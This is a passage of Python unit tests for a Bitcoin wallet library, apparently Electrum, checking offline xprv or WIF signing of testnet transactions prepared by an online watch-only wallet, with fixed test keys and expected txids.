ee26f86a68f08c702941ffaf2fb7213e5026aea10247304402203a2613ae68f697eb02b5b7d18e3c4236966dac2b3a760e3021197d76e9ad4239022046f9067d3df650fcabbdfd250308c64f90757dec86f0b08813c979a42d06a6ec012102a1d7ee1cb4dc502f899aaafae0a2eb6cbf80d9a1073ae60ddcaabc3b1d1f15df02483045022100ab1bea2cc5388428fd126c7801550208701e21564bd4bd00cfd4407cfafc1acd0220508ee587f080f3c80a5c0b2175b58edd84b755e659e2135b3152044d75ebc4b501210236dd1b7f27a296447d0eb3750e1bdb2d53af50b31a72a45511dc1ec3fe7a684a19391400')
funding_txid = funding_tx.txid()
self.assertEqual('98574bc5f6e75769eb0c93d41453cc1dfbd15c14e63cc3c42f37cdbd08858762', funding_txid)
wallet_online.receive_tx_callback(funding_txid, funding_tx, TX_HEIGHT_UNCONFIRMED)
# create unsigned tx
outputs = [TxOutput(bitcoin.TYPE_ADDRESS, 'tb1qp0mv2sxsyxxfj5gl0332f9uyez93su9cf26757', 2500000)]
tx = wallet_online.mktx(outputs=outputs, password=None, config=self.config, fee=5000)
tx.set_rbf(True)
tx.locktime = 1325340
self.assertFalse(tx.is_complete())
self.assertFalse(tx.is_segwit())
self.assertEqual(1, len(tx.inputs()))
tx_copy = Transaction(tx.serialize())
self.assertTrue(wallet_online.is_mine(wallet_online.get_txin_address(tx_copy.inputs()[0])))
self.assertEqual(tx.txid(), tx_copy.txid())
# sign tx
tx = wallet_offline.sign_transaction(tx_copy, password=None)
self.assertTrue(tx.is_complete())
self.assertFalse(tx.is_segwit())
self.assertEqual('d9c21696eca80321933e7444ca928aaf25eeda81aaa2f4e5c085d4d0a9cf7aa7', tx.txid())
self.assertEqual('d9c21696eca80321933e7444ca928aaf25eeda81aaa2f4e5c085d4d0a9cf7aa7', tx.wtxid())
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_sending_offline_xprv_online_xpub_p2wpkh_p2sh(self, mock_write):
wallet_offline = WalletIntegrityHelper.create_standard_wallet(
# bip39: "qwe", der: m/49'/1'/0'
keystore.from_xprv('uprv8zHHrMQMQ26utWwNJ5MK2SXpB9hbmy7pbPaneii69xT8cZTyFpxQFxkknGWKP8dxBTZhzy7yP6cCnLrRCQjzJDk3G61SjZpxhFQuB2NR8a5'),
gap_limit=4
)
wallet_online = WalletIntegrityHelper.create_standard_wallet(
keystore.from_xpub('upub5DGeFrwFEPfD711qQ6tKPaUYjBY6BRqfxcWPT77hiHz7VMo7oNGeom5EdXoKXEazePyoN3ueJMqHBfp3MwmsaD8k9dFHoa8KGeVXev7Pbg2'),
gap_limit=4
)
# bootstrap wallet_online
funding_tx = Transaction('01000000000116e9c9dac2651672316aab3b9553257b6942c5f762c5d795776d9cfa504f183c000000000000fdffffff8085019852fada9da84b58dcf753d292dde314a19f5a5527f6588fa2566142130000000000fdffffffa4154a48db20ce538b28722a89c6b578bd5b5d60d6d7b52323976339e39405230000000000fdffffff0b5ef43f843a96364aebd708e25ea1bdcf2c7df7d0d995560b8b1be5f357b64f0100000000fdffffffd41dfe1199c76fdb3f20e9947ea31136d032d9da48c5e45d85c8f440e2351a510100000000fdffffff5bd015d17e4a1837b01c24ebb4a6b394e3da96a85442bd7dc6abddfbf16f20510000000000fdffffff13a3e7f80b1bd46e38f2abc9e2f335c18a4b0af1778133c7f1c3caae9504345c0200000000fdffffffdf4fc1ab21bca69d18544ddb10a913cd952dbc730ab3d236dd9471445ff405680100000000fdffffffe0424d78a30d5e60ac6b26e2274d7d6e7c6b78fe0b49bdc3ac4dd2147c9535750100000000fdffffff7ab6dd6b3c0d44b0fef0fdc9ab0ad6eee23eef799eee29c005d52bc4461998760000000000fdffffff48a77e5053a21acdf4f235ce00c82c9bc1704700f54d217f6a30704711b9737d0000000000fdffffff86918b39c1d9bb6f34d9b082182f73cedd15504331164dc2b186e95c568ccb870000000000fdffffff15a847356cbb44be67f345965bb3f2589e2fec1c9a0ada21fd28225dcc602e8f0100000000fdffffff9a2875297f81dfd3b77426d63f621db350c270cc28c634ad86b9969ee33ac6960000000000fdffffffd6eeb1d1833e00967083d1ab86fa5a2e44355bd613d9277135240fe6f60148a20100000000fdffffffd8a6e5a9b68a65ff88220ca33e36faf6f826ae8c5c8a13fe818a5e63828b68a40100000000fdffffff73aab8471f82092e45ed1b1afeffdb49ea1ec74ce4853f971812f6a72a7e85aa0000000000fdffffffacd6459dec7c3c51048eb112630da756f5d4cb4752b8d39aa325407ae0885cba0000000000fdffffff1eddd5e13bef1aba1ff151762b5860837daa9b39db1eae8ea8227c81a5a1c8ba0000000000fdffffff67a096ff7c343d39e96929798097f6d7a61156bbdb905fbe534ba36f273271d40100000000fdffffff109a671eb7daf6dcd07c0ceff99f2de65864ab36d64fb3a890bab951569adeee0100000000fdffffff4f1bdc64da8056d08f79db7f5348d1de55946e57aa7c8279499c703889b6e0fd0200000000fdffffff042f280000000000001600149c756aa33f4f89418b33872a973274b5445c727b80969800000000001600146c540c1c9f546004539f45318b8d9f4d7b4857ef80969800000000001976a91422a6daa4a7b695c8a2dd104d47c5dc73d655c96f88ac809698000000000017a914a6885437e0762013facbda93894202a0fe86e35f8702473044022075ef5f04d7a63347064938e15a0c74277a79e5c9d32a26e39e8a517a44d565cc022015246790fb5b29c9bf3eded1b95699b1635bcfc6d521886fddf1135ba1b988ec012102801bc7170efb82c490e243204d86970f15966aa3bce6a06bef5c09a83a5bfffe02473044022061aa9b0d9649ffd7259bc54b35f678565dbbe11507d348dd8885522eaf1fa70c02202cc79de09e8e63e8d57fde6ef66c079ddac4d9828e1936a9db833d4c142615c3012103a8f58fc1f5625f18293403104874f2d38c9279f777e512570e4199c7d292b81b0247304402207744dc1ab0bf77c081b58540c4321d090c0a24a32742a361aa55ad86f0c7c24e02201a9b0dd78b63b495ab5a0b5b161c54cb085d70683c90e188bb4dc2e41e142f6601210361fb354f8259abfcbfbdda36b7cb4c3b05a3ca3d68dd391fd8376e920d93870d0247304402204803e423c321acc6c12cb0ebf196d2906842fdfed6de977cc78277052ee5f15002200634670c1dc25e6b1787a65d3e09c8e6bb0340238d90b9d98887e8fd53944e080121031104c60d027123bf8676bcaefaa66c001a0d3d379dc4a9492a567a9e1004452d02473044022050e4b5348d30011a22b6ae8b43921d29249d88ea71b1fbaa2d9c22dfdef58b7002201c5d5e143aa8835454f61b0742226ebf8cd466bcc2cdcb1f77b92e473d3b13190121030496b9d49aa8efece4f619876c60a77d2c0dc846390ecdc5d9acbfa1bb3128760247304402204d6a9b986e1a0e3473e8aef84b3eb7052442a76dfd7631e35377f141496a55490220131ab342853c01e31f111436f8461e28bc95883b871ca0e01b5f57146e79d7bb012103262ffbc88e25296056a3c65c880e3686297e07f360e6b80f1219d65b0900e84e02483045022100c8ffacf92efa1dddef7e858a241af7a80adcc2489bcc325195970733b1f35fac022076f40c26023a228041a9665c5290b9918d06f03b716e4d8f6d47e79121c7eb37012102d9ba7e02d7cd7dd24302f823b3114c99da21549c663f72440dc87e8ba412120902483045022100b55545d84e43d001bbc10a981f184e7d3b98a7ed6689863716cab053b3655a2f0220537eb76a695fbe86bf020b4b6f7ae93b506d778bbd0885f0a61067616a2c8bce0121034a57f2fa2c32c9246691f6a922fb1ebdf1468792bae7eff253a99fc9f2a5023902483045022100f1d4408463dbfe257f9f778d5e9c8cdb97c8b1d395dbd2e180bc08cad306492c022002a024e19e1a406eaa24467f033659de09ab58822987281e28bb6359288337bd012103e91daa18d924eea62011ce596e15b6d683975cf724ea5bf69a8e2022c26fc12f0247304402204f1e12b923872f396e5e1a3aa94b0b2e86b4ce448f4349a017631db26d7dff8a022069899a05de2ad2bbd8e0202c56ab1025a7db9a4998eea70744e3c367d2a7eb71012103b0eee86792dbef1d4a49bc4ea32d197c8c15d27e6e0c5c33e58e409e26d4a39a0247304402201787dacdb92e0df6ad90226649f0e8321287d0bd8fddc536a297dd19b5fc103e022001fe89300a76e5b46d0e3f7e39e0ee26cc83b71d59a2a5da1dd7b13350cd0c07012103afb1e43d7ec6b7999ef0f1093069e68fe1dfe5d73fc6cfb4f7a5022f7098758c02483045022100acc1212bba0fe4fcc6c3ae5cf8e25f221f140c8444d3c08dfc53a93630ac25da02203f12982847244bd9421ef340293f3a38d2ab5d028af60769e46fcc7d81312e7e012102801bc7170efb82c490e243204d86970f15966aa3bce6a06bef5c09a83a5bfffe024830450221009c04934102402949484b21899271c3991c007b783b8efc85a3c3d24641ac7c24022006fb1895ce969d08a2cb29413e1a85427c7e85426f7a185108ca44b5a0328cb301210360248db4c7d7f76fe231998d2967104fee04df8d8da34f10101cc5523e82648c02483045022100b11fe61b393fa5dbe18ab98f65c249345b429b13f69ee2d1b1335725b24a0e73022010960cdc5565cbc81885c8ed95142435d3c202dfa5a3dc5f50f3914c106335ce0121029c878610c34c21381cda12f6f36ab88bf60f5f496c1b82c357b8ac448713e7b50247304402200ca080db069c15bbf98e1d4dff68d0aea51227ff5d17a8cf67ceae464c22bbb0022051e7331c0918cbb71bb2cef29ca62411454508a16180b0fb5df94248890840df0121028f0be0cde43ff047edbda42c91c37152449d69789eb812bb2e148e4f22472c0f0247304402201fefe258938a2c481d5a745ef3aa8d9f8124bbe7f1f8c693e2ddce4ddc9a927c02204049e0060889ede8fda975edf896c03782d71ba53feb51b04f5ae5897d7431dc012103946730b480f52a43218a9edce240e8b234790e21df5e96482703d81c3c19d3f1024730440220126a6a56dbe69af78d156626fc9cf41d6aac0c07b8b5f0f8491f68db5e89cb5002207ee6ed6f2f41da256f3c1e79679a3de6cf34cc08b940b82be14aefe7da031a6b012102801bc7170efb82c490e243204d86970f15966aa3bce6a06bef5c09a83a5bfffe024730440220363204a1586d7f13c148295122cbf9ec7939685e3cadab81d6d9e921436d21b7022044626b8c2bd4aa7c167d74bc4e9eb9d0744e29ce0ad906d78e10d6d854f23d170121037fb9c51716739bb4c146857fab5a783372f72a65987d61f3b58c74360f4328dd0247304402207925a4c2a3a6b76e10558717ee28fcb8c6fde161b9dc6382239af9f372ace99902204a58e31ce0b4a4804a42d2224331289311ded2748062c92c8aca769e81417a4c012102e18a8c235b48e41ef98265a8e07fa005d2602b96d585a61ad67168d74e7391cb02483045022100bbfe060479174a8d846b5a897526003eb2220ba307a5fee6e1e8de3e4e8b38fd02206723857301d447f67ac98a5a5c2b80ef6820e98fae213db1720f93d91161803b01210386728e2ac3ecee15f58d0505ee26f86a68f08c702941ffaf2fb7213e5026aea10247304402203a2613ae68f697eb02b5b7d18e3c4236966dac2b3a760e3021197d76e9ad4239022046f9067d3df650fcabbdfd250308c64f90757dec86f0b08813c979a42d06a6ec012102a1d7ee1cb4dc502f899aaafae0a2eb6cbf80d9a1073ae60ddcaabc3b1d1f15df02483045022100ab1bea2cc5388428fd126c7801550208701e21564bd4bd00cfd4407cfafc1acd0220508ee587f080f3c80a5c0b2175b58edd84b755e659e2135b3152044d75ebc4b501210236dd1b7f27a296447d0eb3750e1bdb2d53af50b31a72a45511dc1ec3fe7a684a19391400')
funding_txid = funding_tx.txid()
self.assertEqual('98574bc5f6e75769eb0c93d41453cc1dfbd15c14e63cc3c42f37cdbd08858762', funding_txid)
wallet_online.receive_tx_callback(funding_txid, funding_tx, TX_HEIGHT_UNCONFIRMED)
# create unsigned tx
outputs = [TxOutput(bitcoin.TYPE_ADDRESS, 'tb1qp0mv2sxsyxxfj5gl0332f9uyez93su9cf26757', 2500000)]
tx = wallet_online.mktx(outputs=outputs, password=None, config=self.config, fee=5000)
tx.set_rbf(True)
tx.locktime = 1325341
self.assertFalse(tx.is_complete())
self.assertTrue(tx.is_segwit())
self.assertEqual(1, len(tx.inputs()))
tx_copy = Transaction(tx.serialize())
self.assertTrue(wallet_online.is_mine(wallet_online.get_txin_address(tx_copy.inputs()[0])))
self.assertEqual('3f0d188519237478258ad2bf881643618635d11c2bb95512e830fcf2eda3c522', tx_copy.txid())
self.assertEqual(tx.txid(), tx_copy.txid())
# sign tx
tx = wallet_offline.sign_transaction(tx_copy, password=None)
self.assertTrue(tx.is_complete())
self.assertTrue(tx.is_segwit())
self.assertEqual('3f0d188519237478258ad2bf881643618635d11c2bb95512e830fcf2eda3c522', tx.txid())
self.assertEqual('27b78ec072a403b0545258e7a1a8d494e4b6fd48bf77f4251a12160c92207cbc', tx.wtxid())
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_sending_offline_xprv_online_xpub_p2wpkh(self, mock_write):
wallet_offline = WalletIntegrityHelper.create_standard_wallet(
# bip39: "qwe", der: m/84'/1'/0'
keystore.from_xprv('vprv9K9hbuA23Bidgj1KRSHUZMa59jJLeZBpXPVn4RP7sBLArNhZxJjw4AX7aQmVTErDt4YFC11ptMLjbwxgrsH8GLQ1cx77KggWeVPeDBjr9xM'),
gap_limit=4
)
wallet_online = WalletIntegrityHelper.create_standard_wallet(
keystore.from_xpub('vpub5Y941QgusZGvuD5nXTpUvVWohm8q41uftcRNronjRWs9jB2iVr4BbxqbRfAoQjWHgJtDCQEXChgfsPbEuBnidtkFztZSD3zDKTrtwXa2LCa'),
gap_limit=4
)
# bootstrap wallet_online
funding_tx = Transaction('01000000000116e9c9dac2651672316aab3b9553257b6942c5f762c5d795776d9cfa504f183c000000000000fdffffff8085019852fada9da84b58dcf753d292dde314a19f5a5527f6588fa2566142130000000000fdffffffa4154a48db20ce538b28722a89c6b578bd5b5d60d6d7b52323976339e39405230000000000fdffffff0b5ef43f843a96364aebd708e25ea1bdcf2c7df7d0d995560b8b1be5f357b64f0100000000fdffffffd41dfe1199c76fdb3f20e9947ea31136d032d9da48c5e45d85c8f440e2351a510100000000fdffffff5bd015d17e4a1837b01c24ebb4a6b394e3da96a85442bd7dc6abddfbf16f20510000000000fdffffff13a3e7f80b1bd46e38f2abc9e2f335c18a4b0af1778133c7f1c3caae9504345c0200000000fdffffffdf4fc1ab21bca69d18544ddb10a913cd952dbc730ab3d236dd9471445ff405680100000000fdffffffe0424d78a30d5e60ac6b26e2274d7d6e7c6b78fe0b49bdc3ac4dd2147c9535750100000000fdffffff7ab6dd6b3c0d44b0fef0fdc9ab0ad6eee23eef799eee29c005d52bc4461998760000000000fdffffff48a77e5053a21acdf4f235ce00c82c9bc1704700f54d217f6a30704711b9737d0000000000fdffffff86918b39c1d9bb6f34d9b082182f73cedd15504331164dc2b186e95c568ccb870000000000fdffffff15a847356cbb44be67f345965bb3f2589e2fec1c9a0ada21fd28225dcc602e8f0100000000fdffffff9a2875297f81dfd3b77426d63f621db350c270cc28c634ad86b9969ee33ac6960000000000fdffffffd6eeb1d1833e00967083d1ab86fa5a2e44355bd613d9277135240fe6f60148a20100000000fdffffffd8a6e5a9b68a65ff88220ca33e36faf6f826ae8c5c8a13fe818a5e63828b68a40100000000fdffffff73aab8471f82092e45ed1b1afeffdb49ea1ec74ce4853f971812f6a72a7e85aa0000000000fdffffffacd6459dec7c3c51048eb112630da756f5d4cb4752b8d39aa325407ae0885cba0000000000fdffffff1eddd5e13bef1aba1ff151762b5860837daa9b39db1eae8ea8227c81a5a1c8ba0000000000fdffffff67a096ff7c343d39e96929798097f6d7a61156bbdb905fbe534ba36f273271d40100000000fdffffff109a671eb7daf6dcd07c0ceff99f2de65864ab36d64fb3a890bab951569adeee0100000000fdffffff4f1bdc64da8056d08f79db7f5348d1de55946e57aa7c8279499c703889b6e0fd0200000000fdffffff042f280000000000001600149c756aa33f4f89418b33872a973274b5445c727b80969800000000001600146c540c1c9f546004539f45318b8d9f4d7b4857ef80969800000000001976a91422a6daa4a7b695c8a2dd104d47c5dc73d655c96f88ac809698000000000017a914a6885437e0762013facbda93894202a0fe86e35f8702473044022075ef5f04d7a63347064938e15a0c74277a79e5c9d32a26e39e8a517a44d565cc022015246790fb5b29c9bf3eded1b95699b1635bcfc6d521886fddf1135ba1b988ec012102801bc7170efb82c490e243204d86970f15966aa3bce6a06bef5c09a83a5bfffe02473044022061aa9b0d9649ffd7259bc54b35f678565dbbe11507d348dd8885522eaf1fa70c02202cc79de09e8e63e8d57fde6ef66c079ddac4d9828e1936a9db833d4c142615c3012103a8f58fc1f5625f18293403104874f2d38c9279f777e512570e4199c7d292b81b0247304402207744dc1ab0bf77c081b58540c4321d090c0a24a32742a361aa55ad86f0c7c24e02201a9b0dd78b63b495ab5a0b5b161c54cb085d70683c90e188bb4dc2e41e142f6601210361fb354f8259abfcbfbdda36b7cb4c3b05a3ca3d68dd391fd8376e920d93870d0247304402204803e423c321acc6c12cb0ebf196d2906842fdfed6de977cc78277052ee5f15002200634670c1dc25e6b1787a65d3e09c8e6bb0340238d90b9d98887e8fd53944e080121031104c60d027123bf8676bcaefaa66c001a0d3d379dc4a9492a567a9e1004452d02473044022050e4b5348d30011a22b6ae8b43921d29249d88ea71b1fbaa2d9c22dfdef58b7002201c5d5e143aa8835454f61b0742226ebf8cd466bcc2cdcb1f77b92e473d3b13190121030496b9d49aa8efece4f619876c60a77d2c0dc846390ecdc5d9acbfa1bb3128760247304402204d6a9b986e1a0e3473e8aef84b3eb7052442a76dfd7631e35377f141496a55490220131ab342853c01e31f111436f8461e28bc95883b871ca0e01b5f57146e79d7bb012103262ffbc88e25296056a3c65c880e3686297e07f360e6b80f1219d65b0900e84e02483045022100c8ffacf92efa1dddef7e858a241af7a80adcc2489bcc325195970733b1f35fac022076f40c26023a228041a9665c5290b9918d06f03b716e4d8f6d47e79121c7eb37012102d9ba7e02d7cd7dd24302f823b3114c99da21549c663f72440dc87e8ba412120902483045022100b55545d84e43d001bbc10a981f184e7d3b98a7ed6689863716cab053b3655a2f0220537eb76a695fbe86bf020b4b6f7ae93b506d778bbd0885f0a61067616a2c8bce0121034a57f2fa2c32c9246691f6a922fb1ebdf1468792bae7eff253a99fc9f2a5023902483045022100f1d4408463dbfe257f9f778d5e9c8cdb97c8b1d395dbd2e180bc08cad306492c022002a024e19e1a406eaa24467f033659de09ab58822987281e28bb6359288337bd012103e91daa18d924eea62011ce596e15b6d683975cf724ea5bf69a8e2022c26fc12f0247304402204f1e12b923872f396e5e1a3aa94b0b2e86b4ce448f4349a017631db26d7dff8a022069899a05de2ad2bbd8e0202c56ab1025a7db9a4998eea70744e3c367d2a7eb71012103b0eee86792dbef1d4a49bc4ea32d197c8c15d27e6e0c5c33e58e409e26d4a39a0247304402201787dacdb92e0df6ad90226649f0e8321287d0bd8fddc536a297dd19b5fc103e022001fe89300a76e5b46d0e3f7e39e0ee26cc83b71d59a2a5da1dd7b13350cd0c07012103afb1e43d7ec6b7999ef0f1093069e68fe1dfe5d73fc6cfb4f7a5022f7098758c02483045022100acc1212bba0fe4fcc6c3ae5cf8e25f221f140c8444d3c08dfc53a93630ac25da02203f12982847244bd9421ef340293f3a38d2ab5d028af60769e46fcc7d81312e7e012102801bc7170efb82c490e243204d86970f15966aa3bce6a06bef5c09a83a5bfffe024830450221009c04934102402949484b21899271c3991c007b783b8efc85a3c3d24641ac7c24022006fb1895ce969d08a2cb29413e1a85427c7e85426f7a185108ca44b5a0328cb301210360248db4c7d7f76fe231998d2967104fee04df8d8da34f10101cc5523e82648c02483045022100b11fe61b393fa5dbe18ab98f65c249345b429b13f69ee2d1b1335725b24a0e73022010960cdc5565cbc81885c8ed95142435d3c202dfa5a3dc5f50f3914c106335ce0121029c878610c34c21381cda12f6f36ab88bf60f5f496c1b82c357b8ac448713e7b50247304402200ca080db069c15bbf98e1d4dff68d0aea51227ff5d17a8cf67ceae464c22bbb0022051e7331c0918cbb71bb2cef29ca62411454508a16180b0fb5df94248890840df0121028f0be0cde43ff047edbda42c91c37152449d69789eb812bb2e148e4f22472c0f0247304402201fefe258938a2c481d5a745ef3aa8d9f8124bbe7f1f8c693e2ddce4ddc9a927c02204049e0060889ede8fda975edf896c03782d71ba53feb51b04f5ae5897d7431dc012103946730b480f52a43218a9edce240e8b234790e21df5e96482703d81c3c19d3f1024730440220126a6a56dbe69af78d156626fc9cf41d6aac0c07b8b5f0f8491f68db5e89cb5002207ee6ed6f2f41da256f3c1e79679a3de6cf34cc08b940b82be14aefe7da031a6b012102801bc7170efb82c490e243204d86970f15966aa3bce6a06bef5c09a83a5bfffe024730440220363204a1586d7f13c148295122cbf9ec7939685e3cadab81d6d9e921436d21b7022044626b8c2bd4aa7c167d74bc4e9eb9d0744e29ce0ad906d78e10d6d854f23d170121037fb9c51716739bb4c146857fab5a783372f72a65987d61f3b58c74360f4328dd0247304402207925a4c2a3a6b76e10558717ee28fcb8c6fde161b9dc6382239af9f372ace99902204a58e31ce0b4a4804a42d2224331289311ded2748062c92c8aca769e81417a4c012102e18a8c235b48e41ef98265a8e07fa005d2602b96d585a61ad67168d74e7391cb02483045022100bbfe060479174a8d846b5a897526003eb2220ba307a5fee6e1e8de3e4e8b38fd02206723857301d447f67ac98a5a5c2b80ef6820e98fae213db1720f93d91161803b01210386728e2ac3ecee15f58d0505ee26f86a68f08c702941ffaf2fb7213e5026aea10247304402203a2613ae68f697eb02b5b7d18e3c4236966dac2b3a760e3021197d76e9ad4239022046f9067d3df650fcabbdfd250308c64f90757dec86f0b08813c979a42d06a6ec012102a1d7ee1cb4dc502f899aaafae0a2eb6cbf80d9a1073ae60ddcaabc3b1d1f15df02483045022100ab1bea2cc5388428fd126c7801550208701e21564bd4bd00cfd4407cfafc1acd0220508ee587f080f3c80a5c0b2175b58edd84b755e659e2135b3152044d75ebc4b501210236dd1b7f27a296447d0eb3750e1bdb2d53af50b31a72a45511dc1ec3fe7a684a19391400')
funding_txid = funding_tx.txid()
self.assertEqual('98574bc5f6e75769eb0c93d41453cc1dfbd15c14e63cc3c42f37cdbd08858762', funding_txid)
wallet_online.receive_tx_callback(funding_txid, funding_tx, TX_HEIGHT_UNCONFIRMED)
# create unsigned tx
outputs = [TxOutput(bitcoin.TYPE_ADDRESS, 'tb1qp0mv2sxsyxxfj5gl0332f9uyez93su9cf26757', 2500000)]
tx = wallet_online.mktx(outputs=outputs, password=None, config=self.config, fee=5000)
tx.set_rbf(True)
tx.locktime = 1325341
self.assertFalse(tx.is_complete())
self.assertTrue(tx.is_segwit())
self.assertEqual(1, len(tx.inputs()))
tx_copy = Transaction(tx.serialize())
self.assertTrue(wallet_online.is_mine(wallet_online.get_txin_address(tx_copy.inputs()[0])))
self.assertEqual('ee76c0c6da87f0eb5ab4d1ae05d3942512dcd3c4c42518f9d3619e74400cfc1f', tx_copy.txid())
self.assertEqual(tx.txid(), tx_copy.txid())
# sign tx
tx = wallet_offline.sign_transaction(tx_copy, password=None)
self.assertTrue(tx.is_complete())
self.assertTrue(tx.is_segwit())
self.assertEqual('ee76c0c6da87f0eb5ab4d1ae05d3942512dcd3c4c42518f9d3619e74400cfc1f', tx.txid())
self.assertEqual('729c2e40a2fccd6b731407c01ed304119c1ac329bdf9baae5b642d916c5f3272', tx.wtxid())
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_sending_offline_wif_online_addr_p2pkh(self, mock_write): # compressed pubkey
wallet_offline = WalletIntegrityHelper.create_imported_wallet(privkeys=True)
wallet_offline.import_private_key('p2pkh:cQDxbmQfwRV3vP1mdnVHq37nJekHLsuD3wdSQseBRA2ct4MFk5Pq', pw=None)
wallet_online = WalletIntegrityHelper.create_imported_wallet(privkeys=False)
wallet_online.import_address('mg2jk6S5WGDhUPA8mLSxDLWpUoQnX1zzoG')
# bootstrap wallet_online
funding_tx = Transaction('01000000000101197a89cff51096b9dd4214cdee0eb90cb27a25477e739521d728a679724042730100000000fdffffff048096980000000000160014dab37af8fefbbb31887a0a5f9b2698f4a7b45f6a80969800000000001976a91405a20074ef7eb42c7c6fcd4f499faa699742783288ac809698000000000017a914b808938a8007bc54509cd946944c479c0fa6554f87131b2c0400000000160014a04dfdb9a9aeac3b3fada6f43c2a66886186e2440247304402204f5dbb9dda65eab26179f1ca7c37c8baf028153815085dd1bbb2b826296e3b870220379fcd825742d6e2bdff772f347b629047824f289a5499a501033f6c3495594901210363c9c98740fe0455c646215cea9b13807b758791c8af7b74e62968bef57ff8ae1e391400')
funding_txid = funding_tx.txid()
self.assertEqual('0a08ea26a49e2b80f253796d605b69e2d0403fac64bdf6f7db82ada4b7bb6b62', funding_txid)
wallet_online.receive_tx_callback(funding_txid, funding_tx, TX_HEIGHT_UNCONFIRMED)
# create unsigned tx
outputs = [TxOutput(bitcoin.TYPE_ADDRESS, 'tb1quk7ahlhr3qmjndy0uvu9y9hxfesrtahtta9ghm', 2500000)]
tx = wallet_online.mktx(outputs=outputs, password=None, config=self.config, fee=5000)
tx.set_rbf(True)
tx.locktime = 1325340
self.assertFalse(tx.is_complete())
self.assertEqual(1, len(tx.inputs()))
tx_copy = Transaction(tx.serialize())
self.assertTrue(wallet_online.is_mine(wallet_online.get_txin_address(tx_copy.inputs()[0])))
self.assertEqual(tx.txid(), tx_copy.txid())
# sign tx
tx = wallet_offline.sign_transaction(tx_copy, password=None)
self.assertTrue(tx.is_complete())
self.assertFalse(tx.is_segwit())
self.assertEqual('e56da664631b8c666c6df38ec80c954c4ac3c4f56f040faf0070e4681e937fc4', tx.txid())
self.assertEqual('e56da664631b8c666c6df38ec80c954c4ac3c4f56f040faf0070e4681e937fc4', tx.wtxid())
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_sending_offline_wif_online_addr_p2wpkh_p2sh(self, mock_write):
wallet_offline = WalletIntegrityHelper.create_imported_wallet(privkeys=True)
wallet_offline.import_private_key('p2wpkh-p2sh:cU9hVzhpvfn91u2zTVn8uqF2ymS7ucYH8V5TmsTDmuyMHgRk9WsJ', pw=None)
wallet_online = WalletIntegrityHelper.create_imported_wallet(privkeys=False)
wallet_online.import_address('2NA2JbUVK7HGWUCK5RXSVNHrkgUYF8d9zV8')
# bootstrap wallet_online
funding_tx = Transaction('01000000000101197a89cff51096b9dd4214cdee0eb90cb27a25477e739521d728a679724042730100000000fdffffff048096980000000000160014dab37af8fefbbb31887a0a5f9b2698f4a7b45f6a80969800000000001976a91405a20074ef7eb42c7c6fcd4f499faa699742783288ac809698000000000017a914b808938a8007bc54509cd946944c479c0fa6554f87131b2c0400000000160014a04dfdb9a9aeac3b3fada6f43c2a66886186e2440247304402204f5dbb9dda65eab26179f1ca7c37c8baf028153815085dd1bbb2b826296e3b870220379fcd825742d6e2bdff772f347b629047824f289a5499a501033f6c3495594901210363c9c98740fe0455c646215cea9b13807b758791c8af7b74e62968bef57ff8ae1e391400')
funding_txid = funding_tx.txid()
self.assertEqual('0a08ea26a49e2b80f253796d605b69e2d0403fac64bdf6f7db82ada4b7bb6b62', funding_txid)
wallet_online.receive_tx_callback(funding_txid, funding_tx, TX_HEIGHT_UNCONFIRMED)
# create unsigned tx
outputs = [TxOutput(bitcoin.TYPE_ADDRESS, 'tb1quk7ahlhr3qmjndy0uvu9y9hxfesrtahtta9ghm', 2500000)]
tx = wallet_online.mktx(outputs=outputs, password=None, config=self.config, fee=5000)
tx.set_rbf(True)
tx.locktime = 1325340
self.assertFalse(tx.is_complete())
self.assertEqual(1, len(tx.inputs()))
tx_copy = Transaction(tx.serialize())
self.assertTrue(wallet_online.is_mine(wallet_online.get_txin_address(tx_copy.inputs()[0])))
self.assertEqual(tx.txid(), tx_copy.txid())
# sign tx
tx = wallet_offline.sign_transaction(tx_copy, password=None)
self.assertTrue(tx.is_complete())
self.assertTrue(tx.is_segwit())
self.assertEqual('7642816d051aa3b333b6564bb6e44fe3a5885bfe7db9860dfbc9973a5c9a6562', tx.txid())
self.assertEqual('9bb9949974954613945756c48ca5525cd5cba1b667ccb10c7a53e1ed076a1117', tx.wtxid())
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_sending_offline_wif_online_addr_p2wpkh(self, mock_write):
wallet_offline = WalletIntegrityHelper.create_imported_wallet(privkeys=True)
wallet_offline.import_private_key('p2wpkh:cPuQzcNEgbeYZ5at9VdGkCwkPA9r34gvEVJjuoz384rTfYpahfe7', pw=None)
wallet_online = WalletIntegrityHelper.create_imported_wallet(privkeys=False)
wallet_online.import_address('tb1qm2eh4787lwanrzr6pf0ekf5c7jnmghm2y9k529')
# bootstrap wallet_online
funding_tx = Transaction('01000000000101197a89cff51096b9dd4214cdee0eb90cb27a25477e739521d728a679724042730100000000fdffffff048096980000000000160014dab37af8fefbbb31887a0a5f9b2698f4a7b45f6a80969800000000001976a91405a20074ef7eb42c7c6fcd4f499faa699742783288ac809698000000000017a914b808938a8007bc54509cd946944c479c0fa6554f87131b2c0400000000160014a04dfdb9a9aeac3b3fada6f43c2a66886186e2440247304402204f5dbb9dda65eab26179f1ca7c37c8baf028153815085dd1bbb2b826296e3b870220379fcd825742d6e2bdff772f347b629047824f289a5499a501033f6c3495594901210363c9c98740fe0455c646215cea9b13807b758791c8af7b74e62968bef57ff8ae1e391400')
funding_txid = funding_tx.txid()
self.assertEqual('0a08ea26a49e2b80f253796d605b69e2d0403fac64bdf6f7db82ada4b7bb6b62', funding_txid)
wallet_online.receive_tx_callback(funding_txid, funding_tx, TX_HEIGHT_UNCONFIRMED)
# create unsigned tx
outputs = [TxOutput(bitcoin.TYPE_ADDRESS, 'tb1quk7ahlhr3qmjndy0uvu9y9hxfesrtahtta9ghm', 2500000)]
tx = wallet_online.mktx(outputs=outputs, password=None, config=self.config, fee=5000)
tx.set_rbf(True)
tx.locktime = 1325340
self.assertFalse(tx.is_complete())
self.assertEqual(1, len(tx.inputs()))
tx_copy = Transaction(tx.serialize())
self.assertTrue(wallet_online.is_mine(wallet_online.get_txin_address(tx_copy.inputs()[0])))
self.assertEqual(tx.txid(), tx_copy.txid())
# sign tx
tx = wallet_offline.sign_transaction(tx_copy, password=None)
self.assertTrue(tx.is_complete())
